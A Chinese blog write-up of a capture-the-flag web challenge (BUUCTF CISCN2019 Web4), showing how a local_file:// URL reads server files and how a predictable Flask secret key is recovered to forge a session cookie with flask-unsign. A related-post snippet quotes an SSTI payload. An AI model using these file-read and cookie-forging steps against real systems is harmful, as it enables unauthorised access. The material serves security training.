BUUCTF-[CISCN2019 华东南赛区]Web4

最新推荐文章于 2023-05-24 19:17:56 发布
最新推荐文章于 2023-05-24 19:17:56 发布
阅读量487 收藏
点赞数
分类专栏: CTF 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52517939/article/details/116720077
版权

BUUCTF-[CISCN2019 华东南赛区]Web4

看题

在这里插入图片描述
点击Read somethings,会跳转到

http://3fd8b1f9-614f-47ff-8e79-0f678e7bb4eb.node3.buuoj.cn/read?url=https://baidu.com

看url应该不是PHP,因为PHP几乎没有用这种路由,直接猜flask。使用read?url=local_file:///etc/passwd读取内容。

读取源码:read?url=local_file:///app/app.py

import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

看这个地方

def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

当session中username=fuck时,可以直接得到flag。
所以,骚操作来了:伪造session。

session可不是乱替换的,它是有备而来…(=_=)

准备

伪造session需要密钥,而密钥的生成方式源码也已经给出了。

random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)

对于伪随机数,当seed固定时,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。这里的seed使用的uuid.getnode()函数,该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。

local_file:///sys/class/net/eth0/address

得到Mac地址(每个人都不一样):

02:42:ac:10:a1:50

用python2生成随机数,用python3的话生成小数的位数会不一样。

import random
random.seed(0x0242ac10a150)
print(str(random.random()*233))

得到随机数

222.550669756

session替换

有很多大佬用的是flask-session-cookie-manager-master这个工具,
我也用了,捣鼓了半天,一直报错。。。
然后师哥给我发了这个,他说:“你在练死劲,那不好使。”
https://github.com/Paradoxis/Flask-Unsign
具体安装过程在README.md中,内容是英文,加油!
(这个工具需要python版本大于等于3.6。
个人感觉在kali-Linux环境下更好安装和使用)

安装过程中

如果在执行该命令时报错

pip3 install flask-unsign[wordlist]

可以试着对pip3进行换源,很简单,可以去百度搜一下
(不过,我还是给出来了啦(=_=))
【临时使用国内源】

pip install -i https://pypi.tuna.tsinghua.edu.cn/simple some-package

【设为默认】(设置默认的话,pip版本是需要更新的)

pip install pip -U
pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple

安装完后

flask-unsign --decode --cookie 'eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.YJuCKw.COSA9fupuOO-gxLmD0q5u_lkLCY'

对session解密后得到{'username': b'www-data'}
www-data替换为fuck,即{'username':b'fuck'}
然后对其进行加密

flask-unsign --sign --cookie '{'username':b'fuck'}' --secret  '222.550669756' --no-literal-eval

就会生成替换的session

Int1c2VybmFtZTpiZnVja30i.YJvEYg.fL7nrdiYaqWOKWTv6800WKws9tM

替换后,读取flag

http://3fd8b1f9-614f-47ff-8e79-0f678e7bb4eb.node3.buuoj.cn/flag

就能得到flag了。

挺考验我的,因为我太菜了(=_=)

Andy Noel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2018-2019华东师范大学825计算机学科基础考研真题
02-22
该资源为2018-2019华东师范大学825计算机学科基础考研真题,资源高清无水印哦! 该资源为2018-2019华东师范大学825计算机学科基础考研真题,资源高清无水印哦!
BUUCTF:[CISCN2019 华东赛区]Web4
末初的CSDN博客
07-29 2040
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web4 这种路由处理方式并不像是PHP,尝试了file:///etc/passwd没有效果,猜测Flask,尝试local_file:///读取文件 读取源码: import re, random, uuid, urllib from flask import Flask, session, request app
BUUCTF--[CISCN2019 华东赛区]Web4
qq_46263951的博客
07-27 541
Jwt认识与攻击
[CISCN2019 华东赛区]Web4
cjdgg的博客
05-11 292
[CISCN2019 华东赛区]Web4
2011-2019华东师范大学431金融综合考研真题及答案解析
11-17
该资源为2011-2019华东师范大学431金融综合考研真题及答案解析,资源高清无水印哦! 该资源为2011-2019华东师范大学431金融综合考研真题及答案解析,资源高清无水印哦!
2013-2019华东师范大学图情专硕考研复试真题
11-23
该资源为2013-2019华东师范大学图情专硕考研复试真题,资源高清无水印哦! 该资源为2013-2019华东师范大学图情专硕考研复试真题,资源高清无水印哦!
2002-2019华东师范大学839数据结构考研真题
07-26
该资源为2002-2019华东师范大学839数据结构考研真题,资源高清无水印哦!
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
BUUCTF [CISCN2019 华东赛区]Web4
SanKobe的博客
05-24 244
注意这里有个坑,目标地址设备是用python2跑的,而我这里是python3,之前我一直用这个当SECRET_KEY,然后一直跑不出flag,百度了一下,python2和python3 random出来的位数是不一样的。最近打比赛遇到了flask_session伪造相关的题目,没学过,又碰巧随机挑了道BUUCTF的题目正好考的flask_session伪造,看完各位师傅的WP后,进行一次自我总结。百度了一下linux下设备网卡地址在/sys/class/net/eth0/address下。
BUUCTF:[CISCN2019 华东赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 836
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
[CISCN2019 华东赛区]Web4 FLASK的session伪造
qq_54929891的博客
05-24 529
进入网站后点击read something看见一个疑似远程文件泄露 尝试了一下伪协议filter没有反应,file被禁用了 到这里我就卡住了,我想不到还有什么可以远程读取文件的了 学习得知大佬们一看这个路由就不像是php的,于是盲猜是python的FLASK框架,利用load_file来读取源文件(我查不到这个读取的来源,不理解为啥是这个) 可以打开etc/passwd,从最后一行可以看到最后一个用户执行了/app目录下的一个/bin/ash命令,也就意味着我们当前在/app目录的上..
ciscn2019 华东赛区线下赛WEB第一题
CODER的博客
06-27 1239
题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如 select load_file('/flag')>='A' select load_file('/flag')>='AB' select load_file('/flag')>='ABC' select load_file('/fla...
Web-4(13-16)-BUUCTF平台
~airrudder~
04-10 5494
本篇内容 [网鼎杯 2018]Fakebook [极客大挑战 2019]PHP [极客大挑战 2019]Knife [BJDCTF 2nd]fake google 上一篇 | 目录 | 下一篇 [网鼎杯 2018]Fakebook [极客大挑战 2019]PHP [极客大挑战 2019]Knife [BJDCTF 2nd]fake google =====================...
[CISCN2019 华东赛区]Web11
feng的博客
11-28 285
知识点 Smarty的SSTI WP 很水的一道题,进入环境大致看了一下,因为是个命令执行或者其他功能的题,然后发现了最下面的Build With Smarty ! 大概率就是Smarty的模板注入了: Smarty SSTI 经过测试,发现x-forwarded-for那里存在SSTI,直接得flag: {system("cat /flag")} 做了这么久buuctf…终于有一个这么简单得题目了。。。一直被虐惨了。。。 ...
python - 动物识别产生式系统实验 华东理工、
最新发布
12-13
Python - 动物识别产生式系统实验是华东理工大学计算机科学与工程学院开展的一项实验项目。该项目旨在利用人工智能和机器学习技术,采用产生式系统对动物进行识别和分类。 在该实验中,学生们将利用Python编程语言...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值